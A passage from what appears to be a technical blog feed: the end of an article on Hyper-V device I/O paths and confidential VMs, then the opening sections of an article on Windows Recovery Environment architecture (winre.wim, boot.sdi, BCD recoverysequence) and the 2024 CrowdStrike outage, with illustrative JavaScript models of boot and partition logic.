DDA is not SR-IOV. Discrete Device Assignment covers any PCIe device passthrough, but Microsoft formally supports only GPUs and NVMe as device classes (Microsoft Learn: DDA planning [@ms-dda]).
Confidential VMs do not have the same device set. Hardware constraints reduce or alter the device classes available; always validate the specific synthetic devices your workload depends on are present in the target SKU (Linux kernel: CoCo [@kernel-coco]).

Note:
1. Confidential VM (SEV-SNP / TDX)? Use the OpenHCL paravisor mode (Azure CoCo VM options [@ms-coco-vm-options]).
2. Need ≥40 Gbps with live migration? Use Accelerated Networking; on Boost-enabled SKUs, Boost adds another tier of offload.
3. Need ≥100 Gbps and accept binding to host? Use Discrete Device Assignment / SR-IOV.
4. Maximum guest portability across hypervisors? Use virtio; for bandwidth-sensitive workloads, vDPA.
5. Default Hyper-V workload, broad device coverage, native migration? VMBus + VSP (the default).
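The decision list above can be read as a first-match-wins function. The sketch below is one such reading. The first-match ordering is an assumption, and the requirement field names (`confidentialVm`, `gbps`, `needsLiveMigration`, `crossHypervisor`, `bandwidthSensitive`) are hypothetical names chosen for this example.

```javascript
// The operator decision list as a first-match-wins function.
// Field names on `req` are hypothetical, chosen for this sketch.
function chooseIoPath(req) {
  if (req.confidentialVm) return 'OpenHCL paravisor mode';
  if (req.gbps >= 40 && req.needsLiveMigration) return 'Accelerated Networking';
  if (req.gbps >= 100 && !req.needsLiveMigration) return 'DDA / SR-IOV';
  if (req.crossHypervisor) return req.bandwidthSensitive ? 'virtio + vDPA' : 'virtio';
  return 'VMBus + VSP';
}

const examples = [
  { confidentialVm: true, gbps: 100, needsLiveMigration: true },
  { gbps: 50, needsLiveMigration: true },
  { gbps: 100, needsLiveMigration: false },
  { gbps: 10, crossHypervisor: true, bandwidthSensitive: true },
  { gbps: 10, needsLiveMigration: true },
];
for (const req of examples) {
  console.log(JSON.stringify(req), '=>', chooseIoPath(req));
}
```

Ordering matters: the confidentiality requirement is checked first because it constrains where the device backend may live, and throughput tuning only happens inside that constraint.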

Open problems worth watching

The substantive open problems are:

A standardised paravisor feature-enumeration interface. OpenHCL is the first auditable paravisor, but there is no portable contract a guest can use to query "what does this paravisor support." The TLFS gave us this for hypervisors; the paravisor analogue is missing (Linux kernel: CoCo [@kernel-coco]).
Confidential-VM-friendly live migration with paravirt devices. Hardware-attested state cannot be cloned trivially; today's pragmatic answer is to constrain migration in CoCo VMs. A general solution is open.
A formal model of the VMBus offer/rescind state machine. The kernel docs describe it narratively. A model that the VSP code could be checked against would let static analysis rule out the bug class behind the headline CVEs.
Live-migrating stateful SR-IOV VFs without device cooperation. Vendor proposals exist; an industry standard does not.
Erasing memory-unsafety in legacy VSPs. The Rust rewrite path in OpenVMM is correct; the multi-year engineering effort to convert every existing VSP is real. CVE-2024-21407 is recent enough to remind everyone the bug class is still producing fresh entries.

What to remember in five years

The most important sentence in this article is one I have been quietly preparing throughout: the durable architectural invariant in Hyper-V is shared-memory ring + doorbell, with a published guest-side contract. Everything else, including the choice of programming language for the VSP, the question of whether the data plane is software or hardware, and even whether the trust boundary places the VSP on the host or in a paravisor, is implementation. The transport is the invariant. That is the lesson the next decade of CoCo VMs and SmartNIC offload is converging toward: keep the contract stable, and let everything else change.

FAQ

No. Hyper-V guest drivers first landed in the upstream Linux kernel in 2.6.32 (December 2009), and the current set (`hv_vmbus`, `hv_netvsc`, `hv_storvsc`, `hv_utils`, `pci-hyperv`, `hv_balloon`) ships in every mainstream distribution. The legacy LIS package is a holdover from the era before in-tree support and can in fact break MSI-X handling and PCI passthrough if installed on top of a modern kernel (Linux kernel: Hyper-V overview [@kernel-hyperv-overview]).

Because the trust gradient is asymmetric. The VSP runs in the root partition's kernel, the most privileged context on the box; the VSC runs in a normal guest kernel. Bytes flowing from guest to host get parsed by code with full system privilege. A VSC bug typically harms only the guest; a VSP bug can be a cross-tenant compromise. The pattern is visible in the CVE record: CVE-2017-0075 [@nvd-cve-2017-0075], CVE-2021-28476 [@nvd-cve-2021-28476], and CVE-2024-21407 [@nvd-cve-2024-21407] all hit host-side parsers.

For live migration. SR-IOV gives you near-bare-metal throughput but binds the VM to a specific physical NIC; you cannot migrate that state. Keeping a VMBus-backed `netvsc` device in the same guest gives the hypervisor a software path it can fall back to during migration windows. The Linux kernel netvsc doc describes this failover explicitly: when SR-IOV is enabled, the VF is enslaved by netvsc and the data path switches transparently when the VF is up (Linux kernel: netvsc [@kernel-netvsc]).

OpenHCL is a *configuration* of OpenVMM, not a separate codebase. OpenVMM is the Rust virtualization stack at github.com/microsoft/openvmm [@github-openvmm]; OpenHCL is OpenVMM run as a paravisor inside a confidential VM's higher-trust virtual trust level (VTL2), so that the synthetic-device backends sit inside the guest's own trust boundary rather than on a host the guest cannot trust. The same Rust code can run as a host-side VMM (when paired with a hypervisor on the host) or as an in-guest paravisor (when running inside a SEV-SNP or TDX VM).

Both directions exist with caveats. OpenVMM, when used as a host VMM, supports both VMBus and virtio backends, so a Linux virtio guest can run on a Microsoft-developed VMM (github.com/microsoft/openvmm [@github-openvmm]). Native Hyper-V on a Windows Server host historically expects VMBus-driven guests; there is no in-box virtio device emulation on a stock Hyper-V Server. KVM hosts can technically present a VMBus-shaped device, but in practice the production answer on KVM is virtio.

Generation-2 VMs use UEFI with Secure Boot, boot from synthetic SCSI, and have no emulated IDE, PS/2, or PIC in the data path (Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms]). Every emulator that is removed is one fewer parser running in the most privileged kernel on the host, so the host-side attack surface is meaningfully smaller. Generation-1 still exists for legacy guests that only know how to boot from BIOS + IDE.

VBS uses the Hyper-V hypervisor to split a single Windows install into VTL0 (the normal kernel and apps) and VTL1 (the Secure Kernel and trustlets like `lsaiso.exe`). The hypervisor enforces that VTL0 cannot read or modify VTL1's memory, even with kernel privileges. So an attacker who already has SYSTEM-level code execution in the normal world cannot trivially extract LSASS secrets or load arbitrary unsigned kernel code; the hypervisor stops them. This works on any modern Windows machine with the right CPU features, regardless of whether you ever run a VM yourself (Microsoft Learn: Windows Server 2016 What's New [@ms-server-2016]).

The Day 8.5 Million Devices Couldn't Boot -- and How Microsoft Rebuilt Recovery as a Security Surface

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

**On July 19, 2024, the Windows Recovery Environment worked exactly as designed -- and that was the problem.** WinRE assumed a human operator per machine, and CrowdStrike's Channel File 291 priced that assumption at 8.5 million endpoints. The Windows Resiliency Initiative -- Quick Machine Recovery, MVI 3.0, the user-mode endpoint security platform, Intune-surfaced WinRE state, Point-in-Time Restore, and Cloud Rebuild -- is Microsoft's first systemic admission that the recovery path is part of the security architecture. This article maps the architecture, the program, and the trade-off it cannot remove.

1. A Fleet That Cannot Boot Itself

At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 to its Falcon sensor on Windows. Forty-eight minutes later -- 04:57 UTC, give or take an hour depending on which time zone the failing devices happened to wake into -- the calls began. By the time CrowdStrike reverted the file at 05:27 UTC, roughly 8.5 million Windows endpoints were stuck in a bug-check loop on csagent+0xe14ed: a read-out-of-bounds page fault inside a kernel-mode driver registered as SERVICE_SYSTEM_START (Start=1), so it reloaded on every reboot [@crowdstrike-tech-details, @ms-security-jul27, @ms-crowdstrike-jul20].

The fix was published almost immediately. "Boot to Safe Mode," it said. "Delete C-00000291*.sys. Reboot." If the volume was BitLocker-encrypted, find the recovery key first [@ms-kb5042421]. The instruction was technically correct. It was also a procedure for one machine. The Windows Recovery Environment that the procedure depended on -- WinRE -- worked exactly as it was designed to work, on every one of those 8.5 million devices [@ms-crowdstrike-jul20]. That was the problem.

Think about the engineering. The recovery partition was where it should be. The Boot Configuration Data store pointed at the right winre.wim. The two-failed-boots trigger fired. The blue Safe Mode tile rendered. The keyboard input handler took keystrokes. The NTFS read-write driver inside WinRE deleted the bad channel file. The reboot succeeded. Every line of code in the recovery path behaved exactly as the engineers in Redmond had specified. The architecture did not break.

What broke was the architecture's central assumption: that a person would be sitting in front of the screen.

This article argues that the assumption was a security choice as much as a usability choice, and that the cost of that choice was a denial-of-service event measured not in seconds of downtime but in person-days of triage. What follows: the WinRE architecture as it actually exists on every Windows 11 device today, the lineage that produced that architecture, the failure mode that priced the architecture's blind spot, and the Windows Resiliency Initiative that Microsoft began assembling in the months after the incident.

A second thesis follows from the first. Recoverability is a security property. A platform that cannot recover at scale cannot guarantee availability; a platform that cannot guarantee availability cannot keep its confidentiality and integrity promises either, because operations teams in the middle of a fleet-down event will eventually pull every encryption layer and every signing check that gets in their way. The two legs of the CIA triad we usually study -- confidentiality and integrity -- have spent decades crowding out the third, availability. CrowdStrike forced the third one back onto the page.

If WinRE worked perfectly on July 19, 2024, what does it actually do? And how did a recovery primitive end up being the architecture's single point of human dependence? Those questions are next.

2. The Architecture: WinRE, `winre.wim`, `boot.sdi`, ReAgentC

Before we explain how WinRE failed at scale, we have to be precise about what WinRE is. Most engineers know it as the screen that appears after two bad boots. That description is correct and unhelpful. WinRE is a Windows Preinstallation Environment image -- winre.wim -- backed by a system deployment image ramdisk and managed by ReAgentC.exe, registered with the Windows Boot Manager via an entry in the Boot Configuration Data store [@ms-winre-tech-ref, @ms-reagentc, @ms-bcd]. Each of those four moving pieces does one job; together they make the recovery surface possible.

Windows PE (WinPE): a small, self-contained Windows operating system used to install, deploy, and repair Windows desktop editions and Windows Server [@ms-winpe-intro]. WinPE is the substrate of Windows Setup, the install media's `boot.wim`, and `winre.wim`. The base image requires 512 MB of RAM and automatically reboots after 240 hours of continuous use on Windows 10 1803 and later [@ms-winpe-intro]. Originally released to manufacturing in 2002 by a Microsoft team that included Vijay Jayaseelan, Ryan Burkhardt, and Richard Bond [@wiki-winpe].

boot.sdi: a small image-format file that the Windows Boot Manager uses to allocate a RAM disk into which a WIM image can be mounted at boot time. The WinRE BCD entry references `boot.sdi` through a `ramdiskoptions` element; the `osdevice` element then names `winre.wim` as the image to mount inside that RAM disk [@ms-bcd, @ms-winre-tech-ref].

Boot Configuration Data (BCD): the binary database that replaced `boot.ini` in Windows Vista. The BCD lives on the EFI System Partition on UEFI machines and is the data structure the boot manager reads to decide what to boot. Each entry is a typed collection of *elements* -- `device`, `osdevice`, `path`, `winpe`, `ramdiskoptions`, `recoverysequence`, and others -- manipulated with `bcdedit.exe` [@ms-bcd].

Windows RE Tools partition: a dedicated GPT partition holding `winre.wim`, identified by partition Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and recommended for placement immediately after the Windows partition. The minimum size is 300 MB, with 250 MB of free space recommended to accommodate future updates [@ms-uefi-gpt]. On Image Configuration Designer media, this partition is the default layout; clean Setup may instead use a `\Recovery\WindowsRE` folder inside the Windows partition [@ms-winre-tech-ref].

Restated in the order a practitioner encounters them on disk, the four pieces are:

The recovery partition. The default UEFI/GPT layout from the Image Configuration Designer places a Windows RE Tools partition after the Windows partition, sized to hold winre.wim with headroom for cumulative-update growth [@ms-uefi-gpt]. The GPT Type ID DE94BBA4-06D1-4D40-A16A-BFD50179D6AC lets bootmgr find the partition without depending on the Windows volume's drive letter. A \Recovery\WindowsRE folder inside the OS volume is an equally valid alternative; some OEMs use one, some the other. The variability is invisible at runtime: bootmgr follows the BCD, not the disk layout. But it matters at provisioning time. Always check reagentc /info after deployment to know which arrangement you have, because the Microsoft-recommended fix for "winre.wim is too small after a cumulative update" (KB5028997) depends on which partition the image lives in.
winre.wim. A customised WinPE image. The lineage goes back to Windows PE 1.0, RTMed in 2002 from Windows XP RTM [@wiki-winpe]. Today's winre.wim is built from Windows 10 / 11's WinPE 10 line and includes the recovery shell, Startup Repair, System Restore (when enabled on the host), command prompt, and a curated list of optional drivers. The base image still inherits the WinPE rules: 512 MB minimum RAM, 240-hour reboot cap on Windows 10 1803+ [@ms-winpe-intro].
boot.sdi. Sits on the recovery partition (or in \Recovery\WindowsRE\) and acts as a fixed-size container into which the boot manager creates a RAM disk at boot time [@ms-bcd]. The .sdi extension stands for *System Deployment Image*, the same file format used by older Windows Deployment Services workflows in which a thin ramdisk holds a boot.wim for PXE installs. The RAM disk is where winre.wim is mounted. boot.sdi is small (a few megabytes), unmodifiable in normal operation, and one of the parsers later abused by the BitUnlocker chain [@ms-bitunlocker-blog]; we return to that in Section 9.
ReAgentC.exe. The in-box management tool. Microsoft Learn documents the supported switches: /info, /enable, /disable, /setreimage /Path <Folder>, /boottore, /setbootshelllink, and the now-deprecated /setosimage (no longer used on Windows 10 or later) [@ms-reagentc]. The same page notes that for offline operations on WinPE 2.x/3.x/4.x images, administrators must instead use Winrecfg.exe from the Windows Assessment and Deployment Kit -- a clue that the online mode of ReAgentC.exe predated the offline mode. The tool has shipped since at least Windows 7; the precise RTM month is not surfaced on Microsoft Learn today. The web is full of confident claims that ReAgentC.exe first shipped in Vista, Windows 7, or Windows 8. The safe attribution is "Windows 7 onwards" because that is the era when the recovery-partition + ReAgentC model became the supported default. Microsoft Learn does not name an exact ship version, and the AI summaries that do are inferring from circumstantial evidence [@ms-reagentc].
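The two on-disk arrangements described above can be told apart by partition type alone. The sketch below works over a hypothetical, already-parsed partition list. The record fields (`index`, `typeId`, `sizeMb`, `hasRecoveryFolder`) are invented for this example and are not the output format of `reagentc` or any Windows API. The Type ID and the 300 MB minimum come from the text above.

```javascript
// Classify where winre.wim lives, given a hypothetical parsed partition list.
const WINRE_TYPE_ID = 'DE94BBA4-06D1-4D40-A16A-BFD50179D6AC';
const MIN_SIZE_MB = 300; // minimum recovery-partition size cited above

function locateWinre(partitions) {
  // GPT type GUIDs are compared case-insensitively.
  const tools = partitions.find((p) => p.typeId.toUpperCase() === WINRE_TYPE_ID);
  if (tools) {
    return {
      layout: 'dedicated-partition',
      index: tools.index,
      sizeOk: tools.sizeMb >= MIN_SIZE_MB,
    };
  }
  // Fallback arrangement: a \Recovery\WindowsRE folder on the OS volume.
  const os = partitions.find((p) => p.hasRecoveryFolder);
  if (os) return { layout: 'os-volume-folder', index: os.index, sizeOk: null };
  return { layout: 'none', index: null, sizeOk: null };
}

const disk = [
  { index: 1, typeId: 'C12A7328-F81F-11D2-BA4B-00A0C93EC93B', sizeMb: 260 },    // EFI System Partition
  { index: 2, typeId: 'E3C9E316-0B5C-4DB8-817D-F92DF00215AE', sizeMb: 16 },     // Microsoft Reserved
  { index: 3, typeId: 'EBD0A0A2-B9E5-4433-87C0-68B6B72699C7', sizeMb: 480000 }, // Windows (basic data)
  { index: 4, typeId: 'de94bba4-06d1-4d40-a16a-bfd50179d6ac', sizeMb: 750 },    // Windows RE Tools
];
console.log(locateWinre(disk));
```

On a real machine, `reagentc /info` remains the authoritative check; the sketch only shows why the Type ID is enough for the boot manager to find the image without a drive letter.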

All four pieces have to cooperate at the worst possible moment: when the Windows partition refuses to boot. The question for the next section is the literal handoff. How does the firmware end up running winre.wim?

3. The Mechanism: How a WinRE Boot Actually Happens

There is a sentence that appears in dozens of TechNet-era guides and AI summaries: Windows boots WinRE by running winload.exe /recovery. That sentence is wrong. There is no /recovery switch on winload.efi or winload.exe. The BCD Boot Options Reference enumerates every legal element on a boot entry, and recoverysequence is one of them; a command-line switch with that name is not [@ms-bcd]. WinRE is selected through the BCD, not through a flag passed to the loader.

Note: The BCD Boot Options Reference defines every element on a boot entry: device, osdevice, path, description, recoverysequence, winpe, ramdisksdidevice, ramdisksdipath, and a few dozen others [@ms-bcd]. None of them is exposed as a winload.exe /recovery command-line flag. The recovery handoff happens entirely inside the boot manager, before winload.efi ever runs.

Walk the literal boot sequence on a UEFI machine [@ms-winre-tech-ref, @ms-bcd]:

Firmware passes control to bootmgfw.efi on the EFI System Partition. (On legacy BIOS, it would be bootmgr from the active partition.)
The boot manager reads the BCD store. There is one entry of type Windows Boot Manager and one or more entries of type Windows Boot Loader.
The OS loader entry carries an element called recoverysequence, set to the GUID of a separate BCD entry. That separate entry is the WinRE configuration.
On a normal boot, the boot manager loads the OS entry's path (\Windows\System32\winload.efi) against the OS volume named in device/osdevice, and winload.efi brings up the kernel.
On a recovery trigger -- two failed boots, a corrupted system file, an explicit reagentc /boottore, or the user choosing Restart from the Advanced Startup menu -- the boot manager instead follows recoverysequence to the WinRE entry.
The WinRE entry's elements look like this: winpe Yes, osdevice ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}, device ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}, and path \Windows\System32\Boot\winload.efi. The ramdiskoptions element it points to in turn carries ramdisksdidevice and ramdisksdipath (\Recovery\WindowsRE\boot.sdi).
The boot manager creates a RAM disk backed by boot.sdi, mounts winre.wim inside it, and starts winload.efi against that ramdisk. From winload.efi's point of view, the OS being booted is the one inside winre.wim. The kernel comes up in the RAM disk and presents the Windows RE entry-point UI.

flowchart TD
    F[UEFI firmware] --> BM[bootmgfw.efi on ESP]
    BM --> BCD[Read BCD store]
    BCD --> CHK{Trigger fired?}
    CHK -- No --> OS[OS loader entry, winload.efi, Windows partition]
    CHK -- Yes --> RS[Follow recoverysequence GUID]
    RS --> WRE[WinRE BCD entry: winpe Yes, osdevice ramdisk=...winre.wim]
    WRE --> RD[Allocate RAM disk from boot.sdi]
    RD --> MNT[Mount winre.wim into RAM disk]
    MNT --> WL[winload.efi loads WinPE kernel]
    WL --> UX[WinRE entry-point UI]

The five auto-trigger conditions are enumerated verbatim in the Windows RE Technical Reference [@ms-winre-tech-ref]:

Two consecutive failed attempts to start Windows.
Two consecutive unexpected shutdowns within two minutes of boot completion.
Two consecutive system reboots within two minutes of boot completion.
A Secure Boot error (except for issues related to Bootmgr.efi).
A BitLocker error on touch-only devices.
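The five conditions translate directly into predicates. The sketch below evaluates them against a hypothetical boot-state record. The field names are invented for this example, and nothing here reflects how the boot manager actually stores its counters.

```javascript
// The five documented auto-triggers as predicates over a hypothetical
// boot-state record. Field names are illustrative assumptions.
const TRIGGERS = [
  ['two failed boots', (s) => s.consecutiveFailedBoots >= 2],
  ['two unexpected shutdowns within 2 min of boot', (s) => s.consecutiveEarlyShutdowns >= 2],
  ['two reboots within 2 min of boot', (s) => s.consecutiveEarlyReboots >= 2],
  ['Secure Boot error (not Bootmgr.efi)', (s) => s.secureBootError && !s.errorInBootmgr],
  ['BitLocker error on touch-only device', (s) => s.bitlockerError && s.touchOnly],
];

const CLEAN_STATE = {
  consecutiveFailedBoots: 0,
  consecutiveEarlyShutdowns: 0,
  consecutiveEarlyReboots: 0,
  secureBootError: false,
  errorInBootmgr: false,
  bitlockerError: false,
  touchOnly: false,
};

// Returns the names of every trigger that fires for the given state.
function firedTriggers(state) {
  const s = { ...CLEAN_STATE, ...state };
  return TRIGGERS.filter(([, test]) => test(s)).map(([name]) => name);
}

console.log(firedTriggers({ consecutiveFailedBoots: 2 }));
console.log(firedTriggers({ bitlockerError: true, touchOnly: false }));
console.log(firedTriggers({ secureBootError: true, errorInBootmgr: true }));
```

A BitLocker error on a device with a keyboard, and a Secure Boot error in Bootmgr.efi itself, both come back empty. These are the exceptions the reference spells out.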

flowchart LR
    A[Two failed boots] --> ENT[Enter WinRE]
    B[Two unexpected shutdowns within 2 min of boot] --> ENT
    C[Two reboots within 2 min of boot] --> ENT
    D[Secure Boot error -- not Bootmgr.efi] --> ENT
    E[BitLocker error on touch-only device] --> ENT

Walking the BCD elements themselves makes the absence of any /recovery switch visible. Here is a minimal model of what the boot manager actually consumes.

{`
// Paraphrased from the BCD Boot Options Reference. Real bcdedit output is text,
// but the boot manager reads it as a typed key/value store.

const bcd = {
  bootmgr: {
    type: 'Windows Boot Manager',
    default: '{current}',
    displayorder: ['{current}'],
  },
  '{current}': {
    type: 'Windows Boot Loader',
    device: 'partition=C:',
    osdevice: 'partition=C:',
    path: '\\Windows\\system32\\winload.efi',
    description: 'Windows 11',
    recoverysequence: '{a1b2-...-winre-guid}',
    recoveryenabled: 'Yes',
  },
  '{a1b2-...-winre-guid}': {
    type: 'Windows Boot Loader',
    device: 'ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}',
    osdevice: 'ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}',
    path: '\\Windows\\system32\\Boot\\winload.efi',
    description: 'Windows Recovery Environment',
    winpe: 'Yes',
    nx: 'OptIn',
  },
  '{ramdiskopts}': {
    type: 'Device Options',
    description: 'Ramdisk Options',
    ramdisksdidevice: 'partition=\\Device\\HarddiskVolume4',
    ramdisksdipath: '\\Recovery\\WindowsRE\\boot.sdi',
  },
};

// The boot manager picks one of these entries, depending on whether
// recoverysequence has been activated. No command-line flag is involved.
// bootDecision is an illustrative model, not boot manager code; its arguments
// are assumed to be the failed-boot count and two error flags.
function bootDecision(failedBoots, secureBootError, bitLockerError) {
  const loader = bcd[bcd.bootmgr.default];
  const triggered = failedBoots >= 2 || secureBootError || bitLockerError;
  if (triggered && loader.recoveryenabled === 'Yes') {
    return bcd[loader.recoverysequence];
  }
  return loader;
}

const chosen = bootDecision(2, false, false);
console.log('Loader path the boot manager invokes:');
console.log(' ' + chosen.path);
console.log('Backing device:');
console.log(' ' + chosen.osdevice);
console.log('winpe flag (Yes means "boot a WIM into a ramdisk"):');
console.log(' ' + (chosen.winpe || '(unset, normal OS boot)'));
`}

That is the entire mechanism. Two failed boots flip an in-BCD counter; the boot manager follows recoverysequence instead of the default loader path; the WinRE entry mounts winre.wim in a RAM disk; the kernel inside winre.wim comes up. No flags, no shells, no scripts.

Now we know what WinRE is and how it boots. The remaining historical question is how this architecture came to be, and what about it did not change between 2007 and July 19, 2024.

4. Historical Origins: From the Recovery Console to the Recovery Partition (2000-2012)

Every architectural choice in WinRE was a response to something that did not work the year before. Walk the four pre-WRI generations of Windows recovery and the story is one long relaxation of the assumption that recovery requires physical media.

Generation 1: Emergency Repair Disk (NT 3.x and 4.0, 1993-2000)

A floppy disk plus a %SystemRoot%\repair directory contained snapshotted SYSTEM, SOFTWARE, SAM, and SECURITY registry hives [@wiki-recovery-console]. The administrator booted from the three Windows NT Setup floppies, pressed R for Repair, fed the floppy when prompted, and Setup wrote the snapshotted hives back over the damaged on-disk copies. ERD repaired the registry, nothing more. If NTOSKRNL.EXE itself was missing, the operator was reduced to a DOS floppy plus EXPAND from the install CD. The architecture's failure mode was the obvious one for a floppy-based snapshot system: the floppy got lost; the snapshot was stale; the scope was too narrow.

Emergency Repair Disk (ERD): the Windows NT 3.x and 4.0 recovery mechanism, a snapshot of the registry hives written to a floppy by `RDISK.EXE` plus a small `%SystemRoot%\repair` folder. It restored only the registry and required the NT Setup floppies to boot. Wikipedia's *Recovery Console* article identifies the Recovery Console as ERD's successor [@wiki-recovery-console].

Generation 2: Recovery Console (Windows 2000, February 17, 2000)

The Recovery Console replaced the binary "restore the snapshot" decision with a programmable shell. Boot from the Windows 2000 or XP install CD; choose Repair; the operator landed in a cmd.exe-shaped environment with around three dozen internal commands: copy, del, attrib, chkdsk, fixboot, fixmbr, bootcfg, and the rest [@wiki-recovery-console]. Authentication required the local Administrator password; filesystem access was sharply constrained (read-only by default; on the boot volume only the root and %SystemRoot% were writable, unless Group Policy relaxed those limits).

Recovery Console: the Windows 2000/XP/Server 2003 command-line repair shell. Initial release February 17, 2000; superseded by the Windows Recovery Environment in Windows Vista. Loadable from the install CD or installable as a startup option via `winnt32 /cmdcons`. Wikipedia lists Windows Recovery Environment as its named successor [@wiki-recovery-console].

The Recovery Console did not fail technically. It failed culturally. By 2005 the Windows administrator population had shifted decisively to GUI tools. A 2005 user with a corrupt NTLDR and no install CD had no path to repair the box without buying replacement media. There was no automatic-repair logic and no default on-disk presence; unless the console had been pre-installed as a startup option, the install CD was required, and every fix demanded muscle memory the typical administrator no longer had.

Generation 3: WinRE on Installation Media (Windows Vista, January 2007)

Vista shipped a full GUI recovery environment built on the brand-new Windows PE 2.0 [@wiki-winpe]. winre.wim carried Startup Repair (a probe-and-fix playbook for boot failures), System Restore (now backed by the Volume Shadow Copy Service), Complete PC Restore, Windows Memory Diagnostic, and a command prompt for the cases nothing else fit. Vista was also the version that introduced the Boot Configuration Data store and bootmgr, replacing NTLDR and the plain-text boot.ini [@ms-bcd]. The same BCD that today still routes the recovery handoff was written for Vista.

The Microsoft Learn "Vista WinRE Overview" page in the previous-versions archive (cc766056) is now misdirected and renders an unrelated USMT migration topic instead of the original article. The load-bearing claim that WinRE was introduced in Vista is independently supported by the Windows PE Wikipedia article's version table (WinPE 2.0 built from Vista RTM) and by Microsoft Learn's Push-button reset overview, which dates Push-Button Reset to Windows 8 and frames it as built on the existing WinRE architecture [@wiki-winpe, @ms-pbr-overview].

Vista WinRE had two architectural problems that the next generation fixed. OEMs were free to put winre.wim wherever they wanted on disk; there was no standard partition. And the install DVD remained the fallback for any user whose OEM had not pre-installed WinRE -- which, by 2010, was most users, none of whom still owned the DVD.

System Restore is itself a sub-thread worth noting. It first shipped in Windows ME (year 2000), was re-implemented atop VSS in Vista, and remains off by default on Windows 10 and 11 [@wiki-system-restore]. The Vista move made it callable from WinRE even when the host Windows would not boot -- a property that, twenty-five years after System Restore first shipped, Point-in-Time Restore is re-engineering for the cloud.

Generation 4: Recovery Partition + ReAgentC + BCD `recoverysequence` (Windows 7, 2009; standardised in Windows 8 and beyond)

This is the architecture every Windows 11 device still runs.

Windows 7 dropped winre.wim onto a dedicated recovery partition with a GPT Type ID that lets bootmgr find it without depending on the Windows volume's drive letter [@ms-uefi-gpt]. ReAgentC.exe became the in-box management tool [@ms-reagentc]. The BCD recoverysequence element became the mechanism by which the OS loader entry points at the WinRE entry. The two-failed-boots trigger entered the Windows RE Technical Reference's enumeration of automatic conditions [@ms-winre-tech-ref].

Generation 4 did not fail. The five auto-trigger conditions still fire on Windows 11 24H2. ReAgentC's switches are still the supported management surface. The recovery-partition GPT Type ID is still DE94BBA4-06D1-4D40-A16A-BFD50179D6AC. It is the architectural floor every later generation extends, including Quick Machine Recovery.
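For readers who inspect partition tables directly, the textual Type ID and the bytes stored in a GPT entry do not look alike: GPT stores the first three GUID fields little-endian and the last two as written. The sketch below shows that conversion for the recovery-partition Type ID quoted above. `guidToGptHex` and `isRecoveryPartition` are hypothetical helper names, not part of any Windows tool.

```javascript
// The recovery-partition Type ID quoted in the text.
const WINRE_PARTITION_TYPE = 'DE94BBA4-06D1-4D40-A16A-BFD50179D6AC';

// Convert a textual GUID to the 16 bytes (as hex) stored in a GPT entry.
// Hypothetical helper for illustration.
function guidToGptHex(guid) {
  const parts = guid.toLowerCase().split('-');
  if (parts.length !== 5 || parts.join('').length !== 32) {
    throw new Error('not a GUID: ' + guid);
  }
  const reverseBytes = (hex) => hex.match(/../g).reverse().join('');
  // Fields 1-3 are stored little-endian; fields 4-5 are stored as written.
  return reverseBytes(parts[0]) + reverseBytes(parts[1]) +
         reverseBytes(parts[2]) + parts[3] + parts[4];
}

// Case-insensitive comparison against the recovery Type ID.
function isRecoveryPartition(typeGuid) {
  return typeGuid.toUpperCase() === WINRE_PARTITION_TYPE;
}

console.log(guidToGptHex(WINRE_PARTITION_TYPE));
console.log(isRecoveryPartition('de94bba4-06d1-4d40-a16a-bfd50179d6ac'));
```

The first line printed is the byte sequence to look for in a hex dump of the partition entry array; the second confirms that the comparison ignores case.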

What Generation 4 did not solve was the cost of recovery at fleet scale. WinRE-on-disk handled one machine perfectly; it had nothing to say about ten thousand machines, each still bounded by the time it took to walk to a desk.

gantt
    dateFormat YYYY
    axisFormat %Y
    section Pre-WinRE
    Emergency Repair Disk (NT 3.x / 4.0) :1993, 2000
    Recovery Console (Windows 2000 onwards) :2000, 2008
    section WinRE
    WinRE on installation media (Vista) :2007, 2009
    Recovery partition + ReAgentC (still current) :2009, 2026
    section Recovery flavours
    Push-Button Reset (Windows 8 onwards) :2012, 2026
    Autopilot Reset (Win 10 1709) :2017, 2026
    Quick Machine Recovery (24H2) :2025, 2026
    Intune Remote Recovery / Cloud Rebuild :2025, 2026

A few parallel paths deserve naming. Push-Button Reset, introduced in Windows 8 in 2012, gave consumers an in-WinRE "Refresh" or "Reset"; image-less reset in Windows 10 and Cloud Download in Windows 10 version 2004 (May 2020) made the reset progressively less dependent on locally-staged install images [@ms-pbr-overview]. Autopilot Reset, shipped in Windows 10 1709 (October 2017), let Intune issue an MDM-initiated wipe-and-rebuild that preserved the device's Entra ID join. Microsoft Diagnostics and Recovery Toolset (DaRT) -- the descendant of Winternals ERD Commander acquired in 2006 and shipped under MDOP starting July 2007 (MDOP 2007), with subsequent releases through MDOP 2008 (April 2008) -- gave Software Assurance customers a richer enterprise tool on top of WinPE [@wiki-mdop-dart]. Older recovery mechanisms quietly aged out: Last Known Good Configuration was no longer the default boot-failure response on Windows 8 onward, and the deprecated-features lifecycle framework is the canonical place to track such retirements today [@ms-deprecated].

By the early 2010s, the architecture that still runs on every Windows 11 device today was largely in place [@ms-winre-tech-ref, @ms-reagentc]. None of these tools gave WinRE permission to call Windows Update from inside the recovery environment. That gap is the next chapter.

5. The Forcing Function: July 19, 2024

We know what WinRE is. We know how it boots. We can now see the CrowdStrike incident as the architecture's stress test. The headline numbers are well-rehearsed at this point; what matters here is the technical cause, the kernel-resident dependency it expressed, and the procedure Microsoft published.

The fault

CrowdStrike's Falcon sensor for Windows version 7.11, released in February 2024, introduced a new IPC Template Type used by behavioural detection logic [@crowdstrike-rca-pdf]. The Template Type declared twenty-one input parameter fields. The integration code that invoked the in-driver Content Interpreter to evaluate Template Instances against host activity supplied only twenty inputs [@crowdstrike-rca-pdf]. For more than four months, Channel File 291 contained no Template Instance whose criterion read the twenty-first field. That made the mismatch latent.

